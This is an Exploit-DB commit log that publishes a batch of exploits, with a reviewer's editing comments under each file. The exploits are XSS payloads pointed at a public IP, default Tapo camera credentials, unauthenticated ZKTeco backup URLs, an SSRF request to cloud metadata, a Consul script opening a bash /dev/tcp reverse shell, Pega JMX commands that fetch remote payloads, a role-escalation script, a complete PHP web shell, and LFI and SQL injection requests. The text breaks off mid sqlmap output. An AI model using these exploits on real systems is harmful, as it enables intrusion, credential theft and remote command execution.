DB: 2023-03-29

25 changes to exploits/shellcodes/ghdb

ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)

Tapo C310 RTSP server v1.3.0 - Unauthorised Video Stream Access

ZKTeco ZEM/ZMM 8.88 - Missing Authentication

Hashicorp Consul v1.0 - Remote Command Execution (RCE)

X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF)

OPSWAT Metadefender Core - Privilege Escalation

Pega Platform 8.1.0 - Remote Code Execution (RCE)

Beauty-salon v1.0 - Remote Code Execution (RCE)

BoxBilling<=4.22.1.5 - Remote Code Execution (RCE)

iBooking v1.0.8 - Arbitrary File Upload

Jetpack 11.4 - Cross Site Scripting (XSS)

Moodle LMS 4.0 - Cross-Site Scripting (XSS)

Online shopping system advanced 1.0 - Multiple Vulnerabilities

rukovoditel 3.2.1 - Cross-Site Scripting (XSS)

Senayan Library Management System v9.5.0 - SQL Injection

Social-Share-Buttons v2.2.3 - SQL Injection

Subrion CMS 4.2.1 - Stored Cross-Site Scripting (XSS)

YouPHPTube<= 7.8 - Multiple Vulnerabilities

Label Studio 1.5.0 - Authenticated Server Side Request Forgery (SSRF)

SuperMailer v11.20 - Buffer overflow DoS

Tunnel Interface Driver - Denial of Service

VMware Workstation 15 Pro - Denial of Service

HDD Health 4.2.0.112 - 'HDDHealth' Unquoted Service Path

SugarSync 4.1.3 - 'SugarSync Service' Unquoted Service Path
Exploit-DB 2023-03-29 00:16:31 +00:00
parent b137003172
commit 6bc7a6f9b0
25 changed files with 1880 additions and 0 deletions


@ -0,0 +1,23 @@
# Exploit Title: ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)
# Date: 9 October 2022
# Exploit Author: Okan Kurtulus
# Vendor Homepage: https://reqlogic.com
# Version: 11.3
# Tested on: Linux
# CVE : 2022-41441
# Proof of Concept:
1- Install ReQlogic v11.3
2- Go to https://localhost:81/ProcessWait.aspx?POBatch=test&WaitDuration=3
3- XSS is triggered when you send the XSS payload to the POBatch and WaitDuration parameters.
#XSS Payload:
</script><script>alert(1)</script>
#Affected Prameters
POBatch
WaitDuration
#Final URLs
http://20.36.214.225:81/ProcessWait.aspx?POBatch=</script><script>alert(1)</script>&WaitDuration=3
http://20.36.214.225:81/ProcessWait.aspx?POBatch=test&WaitDuration=</script><script>alert(1)</script>
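Review bot: the `# CVE : 2022-41441` header is missing the `CVE-` prefix that the other files in this commit use (compare `# CVE : CVE-2022-37255`); write it as `CVE-2022-41441` so the identifier is recognisable by tooling. The `#Final URLs` lines also point at a specific public address, `http://20.36.214.225:81/...`, while step 2 uses `https://localhost:81`; use one placeholder host such as `http://<target>:81/ProcessWait.aspx?...` in both places rather than publishing a live IP, and keep the scheme consistent. Minor: `#Affected Prameters` should read `Parameters`, and one line on the remediation (HTML-encode `POBatch` and `WaitDuration` before they are reflected into the page) would make the entry useful to the people who have to fix it.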


@ -0,0 +1,16 @@
# Exploit Title: Tapo C310 RTSP server v1.3.0- Unauthorised Video Stream Access
# Date: 19th July 2022
# Exploit Author: dsclee1
# Vendor Homepage: tp-link.com
# Software Link: http://download.tplinkcloud.com/firmware/Tapo_C310v1_en_1.3.0_Build_220328_Rel.64283n_u_1649923652150.bin
# Version: 1.3.0
# Tested on: Linux running on camera
# CVE : CVE-2022-37255
These Tapo cameras work via an app. There is a facility on the app to set up a “Camera Account”, which adds user details for the RTSP server. Unfortunately if you dont set up the user details on versions 1.3.0 and below there are default login details. I sourced these from the “cet” binary on the camera.
You can gain unauthorised access to the RTSP stream using the following user details:
User: ---
Password: TPL075526460603
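Review bot: `User: ---` is ambiguous: it is not clear whether the RTSP username is literally `---`, deliberately withheld, or empty, and anyone auditing their own camera needs to know which. The text already contains the mitigation (the default credentials only apply on 1.3.0 and below when no "Camera Account" has been set up in the app), so state it explicitly as a recommendation: configure a Camera Account and update past 1.3.0. Minor: the title `Tapo C310 RTSP server v1.3.0- Unauthorised` is missing the space before the dash that the commit message has, and `dont` should be `don't`.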


@ -0,0 +1,232 @@
# Exploit Title: ZKTeco ZEM/ZMM 8.88 - Missing Authentication
# Exploit Author: RedTeam Pentesting GmbH
# CVE: CVE-2022-42953
Advisory: Missing Authentication in ZKTeco ZEM/ZMM Web Interface
The ZKTeco time attendance device does not require authentication to use the
web interface, exposing the database of employees and their credentials.
Details
=======
Product: ZKTeco ZEM500-510-560-760, ZEM600-800, ZEM720, ZMM
Affected Versions: potentially versions below 8.88 (ZEM500-510-560-760, ZEM600-800, ZEM720) and 15.00 (ZMM200-220-210)
Fixed Versions: firmware version 8.88 (ZEM500-510-560-760, ZEM600-800, ZEM720), firmware version 15.00 (ZMM200-220-210)
Vulnerability Type: Missing Authentication
Security Risk: medium
Vendor URL: https://zkteco.eu/company/history
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-003
Advisory Status: published
CVE: CVE-2022-42953
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42953
Introduction
============
"Time attendance and workforce management is an integrated set of
processes that an institution uses to optimize the productivity of its
employees on the individual, departmental, and entity-wide levels.
ZKTeco has been at the forefront of time attendance solutions for the
last 30 years, integrating advanced biometric technologies with
innovative and versatile terminals." (from company website)
More Details
============
The ZKTeco ZEM/ZMM device allows to store a list of users and their credentials
which may be used to log into the device to prove the users' attendance. These
credentials can either be a PIN, a card for a variety of card readers, or a
fingerprint. The user list can be managed through the web interface.
When opening the web interface, for example on http://192.0.2.1/,
the web server of the device sends a Set-Cookie header for a cookie with
name and value similar to the following:
-----------------------------------------------------------------------
Set-Cookie: SessionID=1624553126; path=/;
-----------------------------------------------------------------------
It was determined that the value of the cookie is roughly the number of
seconds since January 1, 1970. Since the value has a constant offset,
that might allow attackers to guess the cookie value. After setting the
cookie, the webserver redirects the browser to "/csl/login". The login
form provided at this URL has its form action set to "/csl/check". If
the user provides wrong credentials, the web server responds with an
error message. If the user provides correct credentials, the server
responds with a frameset.
In this frameset various options are available, for example a user list.
The list contains a link titled "Options" for each user item which
references a URL similar to the following
http://192.0.2.1/csl/user?did=0&uid=123
Additionally, backups of all settings of the device can be downloaded
from the backup page. The request to do so looks similar to the
following:
-----------------------------------------------------------------------
POST /form/DataApp HTTP/1.1
Host: 192.0.2.1
User-Agent: Mozilla/5.0
Cookie: SessionID=1624553126
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
Origin: http://192.0.2.1
Referer: http://192.0.2.1/form/Device?act=11
style=1
-----------------------------------------------------------------------
When the value "1" is given for the field named "style", the web server
responds with the file "device.dat" (corresponding to the option "Backup
System Data" in the web interface), for all other values the server
responds with the file "data.dat" (corresponding to the option "Backup
User Data" in the web interface). Both files can not only be requested
using HTTP-POST, but also using HTTP-GET with the following URLs:
http://192.0.2.1/form/DataApp?style=1
http://192.0.2.1/form/DataApp?style=0
Both files are - even though it's not obvious from the filename -
compressed tar archives. They can be extracted in the following way:
-----------------------------------------------------------------------
$ mv data.dat data.tgz
$ tar xvzf data.tgz
rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/group.dat
rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/htimezone.dat
rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/lockgroup.dat
rwxrwxrwx 500/513 10512 2021-06-23 07:23 mnt/mtdblock/ssruser.dat
rwxr-xr-x root/root 819896 2021-06-18 07:23 mnt/mtdblock/tempinfo.dat
rwxrwxrwx 500/513 19456 2005-05-05 07:05 mnt/mtdblock/template.dat
rw-r--r-- root/root 360448 2021-06-18 07:23 mnt/mtdblock/templatev10.dat
rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/timezone.dat
rwxrwxrwx 500/513 1372 2005-05-05 07:25 mnt/mtdblock/user.dat
rwxr-xr-x root/root 120 1970-01-01 01:08 mnt/mtdblock/data/alarm.dat
rwxr-xr-x root/root 0 2021-06-23 09:55 mnt/mtdblock/data/extlog.dat
rwxr-xr-x root/root 0 2013-05-04 01:28 mnt/mtdblock/data/extuser.dat
rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/group.dat
rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/htimezone.dat
rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/lockgroup.dat
rwxr-xr-x root/root 54800 2021-06-23 09:55 mnt/mtdblock/data/oplog.dat
rwxr-xr-x root/root 33200 2021-06-23 07:23 mnt/mtdblock/data/sms.dat
rwxr-xr-x root/root 0 2021-06-23 09:55 mnt/mtdblock/data/ssrattlog.dat
rwxr-xr-x root/root 660 2018-11-09 17:28 mnt/mtdblock/data/stkey.dat
rwxrwxrwx 500/513 0 2013-05-04 01:28 mnt/mtdblock/data/template.dat
rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/timezone.dat
rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/transaction.dat
rwxr-xr-x root/root 952 2021-06-23 07:24 mnt/mtdblock/data/udata.dat
rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/user.dat
rwxr-xr-x root/root 0 2013-05-04 01:28 mnt/mtdblock/data/wkcd.dat
-----------------------------------------------------------------------
In this archive, the file "mnt/mtdblock/templatev10.dat" will likely
contain fingerprints, and the file "mnt/mtdblock/ssruser.dat" contains
the user database. The user database contains 72 byte user records, each
containing the privilege level, the PIN, the name of the user, data
stored on external authentication tokens like cards, and the group of
the user.
While the cookie value might be guessable, it is not used for
authentication purposes. An attacker with knowledge of the
corresponding URLs could access the user detail view or the backup
without any authentication.
Proof of Concept
================
http://192.0.2.1/form/DataApp?style=1
http://192.0.2.1/form/DataApp?style=0
http://192.0.2.1/csl/user?did=0&uid=123
Workaround
==========
Network access to the device should be limited to trustworthy persons.
This might be hard to implement if the device is installed in a public
space, especially if it is used for access control, too.
Fix
===
Currently, it is not known whether a newer version might fix this issue.
Due to the age of the product, the vendor might decide not to create a
fix at all.
Security Risk
=============
Attackers with network access to a ZKTeco ZEM/ZMM time attendance device
can get access to employee data, including the credentials used for
accessing the time attendance device. If these credentials are used for
other purposes than time attendance, such as physical access control,
attackers might use them to gain access to protected areas. The actual
risk estimate varies wildly with the kind of access control system in
place and whether network access to the device is prevented by other
means, such as nearby security guards. For this reason, missing
authentication to the ZEM/ZMM web interface is estimated to pose a medium
risk. This estimate might need to be adjusted to the specific use case
of the device.
Timeline
========
2021-06-24 Vulnerability identified
2021-07-12 Customer approved disclosure to vendor
2021-07-16 Vendor notified
2021-08-20 Vendor provides fixed firmware
2022-09-29 Customer approved release of advisory
2022-10-10 CVE ID requested
2022-10-15 CVE ID assigned
2022-10-24 Advisory published
References
==========
https://zkteco.eu/company/history
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
Working at RedTeam Pentesting
=============================
RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://jobs.redteam-pentesting.de/
--
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Alter Posthof 1 Fax : +49 241 510081-99
52062 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen
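Review bot: the `Fix` section ("Currently, it is not known whether a newer version might fix this issue ... the vendor might decide not to create a fix at all") contradicts the header block, which states `Fixed Versions: firmware version 8.88 ... firmware version 15.00`, `Vendor Status: fixed version released`, and the timeline entry `2021-08-20 Vendor provides fixed firmware`. That section reads like a leftover from a pre-disclosure draft; update it to point at the 8.88 / 15.00 firmware so readers do not conclude that no fix exists. `Affected Versions` says "potentially versions below 8.88", so it would also help to name the firmware version the testing was actually done on. From the defender side, the two files the text identifies as the user database (`mnt/mtdblock/ssruser.dat`) and the fingerprint templates (`mnt/mtdblock/templatev10.dat`) both come out of an unauthenticated `GET /form/DataApp?style=0`, so the Workaround section could add that web-server or network logs should be checked for requests to `/form/DataApp` and `/csl/user` from unexpected sources, in addition to restricting network access.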


@ -0,0 +1,31 @@
#Exploit Title: X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF)
#Date: 24/10/2022
#Exploit Author: Hosein Vita & Milad Fadavvi
#Vendor Homepage: https://github.com/zalando/skipper
#Software Link: https://github.com/zalando/skipper
#Version: < v0.13.237
#Tested on: Linux
#CVE: CVE-2022-38580
Summary:
Skipper prior to version v0.13.236 is vulnerable to server-side request forgery (SSRF). An attacker can exploit a vulnerable version of proxy to access the internal metadata server or other unauthenticated URLs by adding an specific header (X-Skipper-Proxy) to the http request.
Proof Of Concept:
1- Add header "X-Skipper-Proxy" to your request
2- Add the aws metadata to the path
GET /latest/meta-data/iam/security-credentials HTTP/1.1
Host: yourskipperdomain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
X-Skipper-Proxy: http://169.254.169.254
Connection: close
Reference:
https://github.com/zalando/skipper/security/advisories/GHSA-f2rj-m42r-6jm2
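Review bot: the affected-version statements disagree: the header says `#Version: < v0.13.237` and the title names v0.13.237, but the summary says "Skipper prior to version v0.13.236 is vulnerable". Pick one cut-off (the GHSA link under `Reference:` should settle which release contains the fix) and use it in the title, the header and the summary. Grammar: "adding an specific header" should be "adding a specific header". On the detection side, the request as shown is a clear signature: an `X-Skipper-Proxy` header arriving from external clients, particularly with a link-local value like `http://169.254.169.254`, is worth alerting on in the proxy's access logs until the upgrade is rolled out; the entry would be more useful if it said so.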


@ -0,0 +1,24 @@
# Exploit Title: Hashicorp Consul v1.0 - Remote Command Execution (RCE)
# Date: 26/10/2022
# Exploit Author: GatoGamer1155, 0bfxgh0st
# Vendor Homepage: https://www.consul.io/
# Description: Exploit for gain reverse shell on Remote Command Execution via API
# References: https://www.consul.io/api/agent/service.html
# Tested on: Ubuntu Server
# Software Link: https://github.com/hashicorp/consul
import requests, sys
if len(sys.argv) < 6:
print(f"\n[\033[1;31m-\033[1;37m] Usage: python3 {sys.argv[0]} <rhost> <rport> <lhost> <lport> <acl_token>\n")
exit(1)
target = f"http://{sys.argv[1]}:{sys.argv[2]}/v1/agent/service/register"
headers = {"X-Consul-Token": f"{sys.argv[5]}"}
json = {"Address": "127.0.0.1", "check": {"Args": ["/bin/bash", "-c", f"bash -i >& /dev/tcp/{sys.argv[3]}/{sys.argv[4]} 0>&1"], "interval": "10s", "Timeout": "864000s"}, "ID": "gato", "Name": "gato", "Port": 80}
try:
requests.put(target, headers=headers, json=json)
print("\n[\033[1;32m+\033[1;37m] Request sent successfully, check your listener\n")
except:
print("\n[\033[1;31m-\033[1;37m] Something went wrong, check the connection and try again\n")
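Review bot: the header block lacks the `# Version:` line the other files carry even though the title names `v1.0`, and `# Description: Exploit for gain reverse shell on Remote Command Execution via API` should read `Exploit to gain a reverse shell via Remote Command Execution in the API`. In the script, `except:` with no exception class swallows everything, including `KeyboardInterrupt`; catch `requests.RequestException` instead. `Request sent successfully` is printed without looking at the response, so a rejected token still reports success; keep the return value of `requests.put(...)` and check `status_code` before printing. The variable named `json` shadows the standard-library module name and will confuse anyone who later adds `import json`. The most important defensive detail is already visible in the usage line: the script needs an `<acl_token>` sent as `X-Consul-Token`, so the issue is bounded by who holds a token that can register services; the header should state that precondition rather than leaving it to be inferred from the code.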


@ -0,0 +1,38 @@
# Exploit Title: Pega Platform 8.1.0 - Remote Code Execution (RCE)
# Google Dork: N/A
# Date: 20 Oct 2022
# Exploit Author: Marcin Wolak (using MOGWAI LABS JMX Exploitation Toolkit)
# Vendor Homepage: www.pega.com
# Software Link: Not Available
# Version: 8.1.0 on-premise and higher, up to 8.3.7
# Tested on: Red Hat Enterprise 7
# CVE : CVE-2022-24082
;Dumping RMI registry:
nmap -sT -sV --script rmi-dumpregistry -p 9999 <IP Address>
;Extracting dynamic TCP port number from the dump (in form of @127.0.0.1
:<PORT>)
;Verifying that the <PORT> is indeed open (it gives 127.0.0.1 in the RMI
dump, but actually listens on the network as well):
nmap -sT -sV -p <PORT> <IP Address>
;Exploitation requires:
;- JVM
;- MOGWAI LABS JMX Exploitation Toolkit (https://github.com/mogwailabs/mjet)
;- jython
;Installing mbean for remote code execution
java -jar jython-standalone-2.7.2.jar mjet.py --localhost_bypass <PORT> <IP
Address> 9999 install random_password http://<Local IP to Serve Payload
over HTTP>:6666 6666
;Execution of commands id & ifconfig
java -jar jython-standalone-2.7.2.jar mjet.py --localhost_bypass <PORT> <IP
Address> 9999 command random_password "id;ifconfig"
;More details:
https://medium.com/@Marcin-Wolak/cve-2022-24082-rce-in-the-pega-platform-discovery-remediation-technical-details-long-live-69efb5437316
Kind Regards,
Marcin Wolak
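Review bot: the command lines are wrapped mid-argument (`<IP` / `Address>`, `http://<Local IP to Serve Payload` / `over HTTP>:6666 6666`), so none of the `nmap` or `java -jar ...` invocations can be copied as written; put each command on one line. The `;` used for the comment lines (`;Dumping RMI registry:`) is not a comment character in a POSIX shell, where it separates commands, so a pasted block would attempt to execute `Dumping`; use `#` as the other files in this commit do. `# Software Link: Not Available` should either carry a link or be dropped, and the `Kind Regards, Marcin Wolak` sign-off belongs in the submission e-mail, not in the exploit file. One point the text makes that deserves emphasis for defenders: the RMI registry on 9999 reports the JMX endpoint as `@127.0.0.1:<PORT>` but that port "actually listens on the network as well", so firewalling 9999 alone is not enough; the dynamic port needs the same restriction.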


@ -0,0 +1,51 @@
# Exploit Title: OPSWAT Metadefender Core - Privilege Escalation
# Date: 24 October 2022
# Exploit Author: Ulascan Yildirim
# Vendor Homepage: https://www.opswat.com/
# Version: Metadefender Core 4.21.1
# Tested on: Windows / Linux
# CVE : CVE-2022-32272
# =============================================================================
# This is a PoC for the Metadefender Core Privilege escalation vulnerability.
# To use this PoC, you need a Username & Password.
# The OMS_CSRF_TOKEN allows users to execute commands with higher privileges.
# =============================================================================
#!/usr/bin/env python3
import requests
import json
from getpass import getpass
url = input("Enter URL in this Format (http://website.com): ")
username = input("Username: ")
password = getpass("Password: ")
url_login = url+'/login'
url_user = url+'/user'
logindata = {"user":username,"password":password}
## Get the OMS_CSRF_TOKEN & session cookie
response_login = requests.post(url_login, json = logindata).json()
json_str = json.dumps(response_login)
resp = json.loads(json_str)
token = resp['oms_csrf_token']
session = resp['session_id']
## Prepare Header & Cookie
headers = {
"oms_csrf_token": token,
}
cookie = {
"session_id_ometascan": session
}
## Set Payload to get Admin role
payload = '{"roles": ["1"]}'
response = requests.put(url_user,headers=headers,cookies=cookie,data=payload)
print("Response status code: "+str(response.status_code))
if response.status_code == 200:
print("Expolit Successful!")
else:
print("Exploit Unsuccessful")
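Review bot: the `#!/usr/bin/env python3` shebang sits after the header comments, so it has no effect when the file is executed directly; move it to the first line. `json.dumps(response_login)` followed by `json.loads(json_str)` only round-trips the dict that `.json()` already returned; use `response_login['oms_csrf_token']` directly and drop the `import json`. The login response is never checked, so a wrong password surfaces as a `KeyError` on `resp['oms_csrf_token']` instead of a readable message; keep the `Response` object from `requests.post(...)` and test `status_code` before calling `.json()`. The `PUT` sends `payload` as a pre-serialised string through `data=` without a `Content-Type: application/json` header; `requests.put(url_user, headers=headers, cookies=cookie, json={"roles": ["1"]})` sets it for you. Typo: `Expolit Successful!`. The header gives `# Version: Metadefender Core 4.21.1` but the title carries no version; add it for consistency with the other entries. Finally, the description says only that the `OMS_CSRF_TOKEN` "allows users to execute commands with higher privileges"; what the code actually shows is an authenticated user assigning themselves a role via `PUT /user`, so the entry should say that the server-side authorization check on role changes is what is missing and what the vendor fix must address.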


@ -0,0 +1,136 @@
## Exploit Title: Beauty-salon v1.0 - Remote Code Execution (RCE)
## Exploit Author: nu11secur1ty
## Date: 10.12.2022
## Vendor: https://code4berry.com/projects/beautysalon.php
## Software: https://code4berry.com/project%20downloads/beautysalon_download.php
## Reference: https://github.com/nu11secur1ty/NVE/blob/NVE-master/2022/NVE-2022-1012.txt
## Description:
The parameter `userimage` from Beauty-salon-2022 suffers from Web
Shell-File Upload - RCE.
NOTE: The user permissions of this system are not working correctly, and
the function is not sanitizing well.
The attacker can use an already created account from someone who controls
this system and he can upload a very malicious file by using this
vulnerability,
or more precisely (no sanitizing of function for edit image), for whatever
account, then he can execute it from anywhere on the external network.
Status: HIGH Vulnerability
[+] Exploit:
```php
<!-- Project Name : PHP Web Shell -->
<!-- Version : 4.0 nu11secur1ty -->
<!-- First development date : 2022/10/05 -->
<!-- This Version development date : 2022/10/05 -->
<!-- Moded and working with PHP 8 : 2022/10/05 -->
<!-- language : html, css, javascript, php -->
<!-- Developer : nu11secur1ty -->
<!-- Web site : https://www.nu11secur1ty.com/ -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "
http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html" charset="euc-kr">
<title>PHP Web Shell Ver 4.0 by nu11secur1ty</title>
<script type="text/javascript">
function FocusIn(obj)
{
if(obj.value == obj.defaultValue)
obj.value = '';
}
function FocusOut(obj)
{
if(obj.value == '')
obj.value = obj.defaultValue;
}
</script>
</head>
<body>
<b>WebShell's Location = http://<?php echo $_SERVER['HTTP_HOST']; echo
$_SERVER['REQUEST_URI'] ?></b><br><br>
HTTP_HOST = <?php echo $_SERVER['HTTP_HOST'] ?><br>
REQUEST_URI = <?php echo $_SERVER['REQUEST_URI'] ?><br>
<br>
<form name="cmd_exec" method="post" action="http://<?php echo
$_SERVER['HTTP_HOST']; echo $_SERVER['REQUEST_URI'] ?>">
<input type="text" name="cmd" size="70" maxlength="500" value="Input
command to execute" onfocus="FocusIn(document.cmd_exec.cmd)"
onblur="FocusOut(document.cmd_exec.cmd)">
<input type="submit" name="exec" value="exec">
</form>
<?php
if(isset($_POST['exec']))
{
exec($_POST['cmd'],$result);
echo '----------------- < OutPut > -----------------';
echo '<pre>';
foreach($result as $print)
{
$print = str_replace('<','<',$print);
echo $print . '<br>';
}
echo '</pre>';
}
else echo '<br>';
?>
<form enctype="multipart/form-data" name="file_upload" method="post"
action="http://<?php echo $_SERVER['HTTP_HOST']; echo
$_SERVER['REQUEST_URI'] ?>">
<input type="file" name="file">
<input type="submit" name="upload" value="upload"><br>
<input type="text" name="target" size="100" value="Location where file will
be uploaded (include file name!)"
onfocus="FocusIn(document.file_upload.target)"
onblur="FocusOut(document.file_upload.target)">
</form>
<?php
if(isset($_POST['upload']))
{
$check = move_uploaded_file($_FILES['file']['tmp_name'], $_POST['target']);
if($check == TRUE)
echo '<pre>The file was uploaded successfully!!</pre>';
else
echo '<pre>File Upload was failed...</pre>';
}
?>
</body>
</html>
```
# Proof and Exploit:
[href](https://streamable.com/ewdmoh)
# m0e3:
[href](
https://www.nu11secur1ty.com/2022/10/beauty-salon-2022-web-shell-file-upload.html
)
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
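Review bot: the signature block (`System Administrator - Infrastructure Engineer` through `nu11secur1ty <http://nu11secur1ty.com/>`) appears twice verbatim at the end of the file, once before and once after the `--` separator; keep one copy. The description names the `userimage` parameter and "the function for edit image" but never gives the request path or form that accepts the upload, so a reader can neither verify the finding nor write a detection rule from it; add the endpoint and an example request, as the multi-vulnerability entries in this commit do. Inside the PHP block, `str_replace('<','<',$print)` replaces `<` with itself, a no-op; this is almost certainly `&lt;` that was decoded during mail or HTML rendering, and the file should be checked against the original source. The `[+] Exploit:` block is a generic PHP web shell rather than anything specific to the product; the product-specific part, why `userimage` accepts a `.php` file and why, as the NOTE says, the per-account permission check does not hold, is what the description should document, together with the fix (validate the uploaded file type server-side and enforce the account ownership check on the edit-image function).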


@ -0,0 +1,82 @@
# Exploit Title: YouPHPTube <= 7.8 - Multiple Vulnerabilities
# Discovery by: Rafael Pedrero
# Discovery Date: 2021-01-31
# Vendor Homepage: https://www.youphptube.com/
# Software Link : https://www.youphptube.com/
# Tested Version: 7.8
# Tested on: Windows 7, 10 using XAMPP
# Vulnerability Type: LFI + Path Traversal
CVSS v3: 7.5
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CWE: CWE-829, CWE-22
Vulnerability description: YouPHPTube v7.8 allows unauthenticated directory
traversal and Local File Inclusion through the parameter in an
/?lang=PATH+TRAVERSAL+FILE (without php) GET request because of an
include_once in locale/function.php page.
Proof of concept:
To detect: http://localhost/youphptube/index.php?lang=)
An error is generated:
Warning: preg_grep(): Compilation failed: unmatched parentheses at offset 0
in C:\xampp\htdocs\YouPHPTube\locale\function.php on line 47
In function.php page, we can see:
// filter some security here
if (!empty($_GET['lang'])) {
$_GET['lang'] = str_replace(array("'", '"', """, "&#039;"),
array('', '', '', ''), xss_esc($_GET['lang']));
}
if (empty($_SESSION['language'])) {
$_SESSION['language'] = $config->getLanguage();
}
if (!empty($_GET['lang'])) {
$_GET['lang'] = strip_tags($_GET['lang']);
$_SESSION['language'] = $_GET['lang'];
}
@include_once
"{$global['systemRootPath']}locale/{$_SESSION['language']}.php";
The parameter "lang" can be modified and load a php file in the server.
In Document root: /phpinfo.php with this content:
<?php echo phpinfo(); ?>
To Get phpinfo.php: http://127.0.0.1/youphptube/?lang=../../phpinfo
Note: phpinfo without ".php".
The new Path is:
@include_once "{$global['systemRootPath']}locale/../../phpinfo.php";
And you can see the PHP information into the browser.
# Vulnerability Type: reflected Cross-Site Scripting (XSS)
CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
Vulnerability description: YouPHPTube 7.8 and before, does not sufficiently
encode user-controlled inputs, resulting in a reflected Cross-Site
Scripting (XSS) vulnerability via the
/<YouPHPTube_path_directory>/signup?redirectUri=<XSS>, in redirectUri
parameter.
Proof of concept:
http://localhost/
<YouPHPTube_path_directory>/signup?redirectUri='"()%26%25<ScRipt>alert(1)</ScRipt>
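Review bot: the quoted `function.php` snippet contains `str_replace(array("'", '"', """, "&#039;"), ...)`, where `"""` is not valid PHP; the third element was most likely `"&quot;"` (the entity for a double quote, matching the `&#039;` entity next to it) that was decoded when the advisory was pasted, so the snippet should be restored from the source file. The CVSS vector for the XSS, `3.0/AV:N/...`, is missing the `CVSS:` prefix that the LFI vector has. On the substance, the filtering shown (`xss_esc`, quote stripping, `strip_tags`) never touches `../`, which is exactly why `lang=../../phpinfo` reaches `include_once "...locale/../../phpinfo.php"`; the write-up would be stronger if it named the fix its own analysis implies: check `$_GET['lang']` against the locale files that actually exist under `locale/` before storing it in `$_SESSION['language']`.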


@ -0,0 +1,343 @@
# Exploit Title: Online shopping system advanced 1.0 - Multiple
Vulnerabilities
# Discovery by: Rafael Pedrero
# Discovery Date: 2020-09-24
# Vendor Homepage:
https://github.com/PuneethReddyHC/online-shopping-system-advanced
# Software Link :
https://github.com/PuneethReddyHC/online-shopping-system-advanced/archive/master.zip
# Tested Version: 1.0
# Tested on: Windows 10 using XAMPP / Linux Ubuntu server 18.04 + Apache +
php 5.X/7.X + MySQL
# Recap: SQLi = 2, RCE = 1, stored XSS = 2, reflected XSS = 2: 7
vulnerabilities
# Vulnerability Type: SQL Injection - #1
CVSS v3: 9.8
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-89
Vulnerability description: Online shopping system advanced 1.0 allows SQL
injection via the admin/edit_user.php, user_id parameter.
Proof of concept:
Save this content in a file:
POST http://127.0.0.1/online/admin/edit_user.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data;
boundary=---------------------------120411781422335
Content-Length: 489
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/online/admin/edit_user.php?user_id=25
Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263
Upgrade-Insecure-Requests: 1
Host: 127.0.0.1
-----------------------------120411781422335
Content-Disposition: form-data; name="user_id"
25
-----------------------------120411781422335
Content-Disposition: form-data; name="email"
otheruser@gmail.com
-----------------------------120411781422335
Content-Disposition: form-data; name="password"
puneeth@123
-----------------------------120411781422335
Content-Disposition: form-data; name="btn_save"
-----------------------------120411781422335--
And execute SQLMAP: >python sqlmap.py -r 1.txt --dbms=mysql -p user_id
(custom) POST parameter 'MULTIPART user_id' is vulnerable. Do you want to
keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 115
HTTP(s) requests:
---
Parameter: MULTIPART user_id ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
